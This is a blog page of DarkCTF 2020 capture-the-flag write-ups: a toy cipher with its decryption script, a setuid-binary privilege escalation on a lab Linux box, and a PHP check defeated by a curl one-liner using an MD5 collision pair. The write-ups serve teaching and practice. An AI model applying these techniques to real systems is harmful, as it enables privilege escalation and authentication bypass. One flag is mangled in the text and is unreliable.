Cookie Consent by PrivacyPolicies.com

Latest entries | Category CTF | Page 2


CTF

DarkCTF 2020: Cryptography/WEIRD ENCRYPTION

Cryptography/WEIRD ENCRYPTION

377 points

I made this weird encryption I hope you can crack it.

File

enc.py

prefix="Hello. Your flag is DarkCTF{"
suffix="}."
main_string="c an u br ea k th is we ir d en cr yp ti on".split()

clear_text = prefix + flag + suffix
enc_text = ""
for letter in clear_text:
c1 = ord(letter) / 16
c2 = ord(letter) % 16
enc_text += main_string[c1]
enc_text += main_string[c2]

print enc_text

Encrypted

eawethkthcrthcrthonutiuckirthoniskisuucthththcrthanthisucthirisbruceaeathanisutheneabrkeaeathisenbrctheneacisirkonbristhwebranbrkkonbrisbranthypbrbrkonkirbrciskkoneatibrbrbrbrtheakonbrisbrckoneauisubrbreacthenkoneaypbrbrisyputi

Solution

main_string = "c an u br ea k th is we ir d en cr yp ti on".split()
flag = open('Encrypted', 'r').read()

def decrypt(letter):
return main_string.index(letter[0]) * 16 + main_string.index(letter[1])


part = ''
letter = []
decrypted = ''
for j, i in enumerate(flag):
part += i
if part in main_string and not (part == 'c' and flag[j+1] == 'r'):
letter.append(part)
part = ''
if len(letter) == 2:
decrypted += chr(decrypt(letter))
letter = []

print(decrypted)

DarkCTF{[email protected][email protected]_M3}

 

DarkCTF 2020: Linux/Squids

Linux/Squids

470 points

Squids in the linux pool

Note: No automation tool required.

ssh [email protected] -p 10000 password: wolfie

Solution

Not much to comment, it take me literally a minute to find the flag.

Found suspicious /opt dir with lots of dirs which I didn't want to manually check, so I've executed find . from within the /opt, found iamroot binary which looks like cat with root permissions (setuid). So I've used the found binary to have a look into /root/flag.txt

darkCTF{y0u_f0und_the_squ1d}

DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web

Solution

We started with some php code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>
</head>
<body>
    

    <style>
        body{
            background-color: whitesmoke
        }
    </style>
<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?>
</body>
</html> 
1

There are bunch of ifs, that needs to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the most tricky one, karma and 2020 parameters must not be equal, but their md5 hashes needs to be the same, so we need to use strings which are affected by hash collision

I've used the hexcodes for the karma and 2020 parameters and decoded them into right strings with xxd on the fly, because bash is not doing well with nonprintable characters. Flag has been conquered with following oneliner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "http://php.darkarmy.xyz:7001/?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09" --verbose

DarkCTF{very_nice_web_challenge_dark_ctf}